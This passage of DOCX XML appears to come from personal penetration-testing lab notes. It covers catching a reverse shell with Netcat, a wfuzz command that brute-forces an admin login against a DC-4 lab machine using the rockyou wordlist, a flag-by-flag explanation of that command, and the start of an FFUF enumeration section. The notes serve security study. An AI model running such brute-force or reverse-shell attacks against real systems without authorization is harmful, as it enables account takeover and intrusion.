    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001114">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1600200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="200" name="image204.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image204.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId339"/>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115">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001116">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After executing the command, we should receive an incoming reverse shell in the second terminal where Netcat is listening.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001117">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="147" name="image148.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image148.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId340"/>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1118">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001119">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 35 shows that we received a reverse shell through the base64 encoded reverse shell one-liner. Great!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000111A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000111B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011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D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000111E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iqbembl8m9br" w:id="140"/>
      <w:bookmarkEnd w:id="140"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force login page using WFuzz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000111F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001120">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wfuzz -z file,/usr/share/wordlists/rockyou.txt -d "username=admin&amp;password=FUZZ" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--hw 17 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.165.195/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001121">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--hw 17</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" filters out pages with 17 words, to filter out false alarms. So change that number to whatever the false alarms are</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001122">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001123">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001124">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId341">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, and it was weird since the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main page</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page, and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page all looked the same. But only the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./login.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page actually worked. So if you have multiple pages that all look the same, try brute forcing them all and one might work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001125">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001126">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001127">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001128">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-z file,/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001129">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="862"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifies the payload source.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="862"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file,/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: use the contents of this file (a wordlist) as payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="862"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means each line in rockyou.txt will be substituted into the FUZZ keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d "username=admin&amp;password=FUZZ"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s used to send a POST request with data (like a form).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> password=FUZZ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">means wfuzz will try each word from rockyou.txt as the password, keeping the username admin constant.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001130">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST-based </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">brute-force login attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001131">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001132">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="765"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--hw 17</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001133">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="765"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells wfuzz to hide responses that have a response with exactly </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">17 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">words.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001134">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="765"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stands for "hide words"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001135">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001136">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011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8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001139">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_96f5caykkl2" w:id="141"/>
      <w:bookmarkEnd w:id="141"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FFUF</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used for Web Fuzzing/Directory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="368300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="480" name="image461.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image461.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId342"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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113D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FFUF does allow recursion but it's slow so just re-fun FFUF on specific folders if you find them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113E">
      <w:pPr>
        <w:rPr>
          <w:shd w:fill="ff9900" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001140">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001141">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
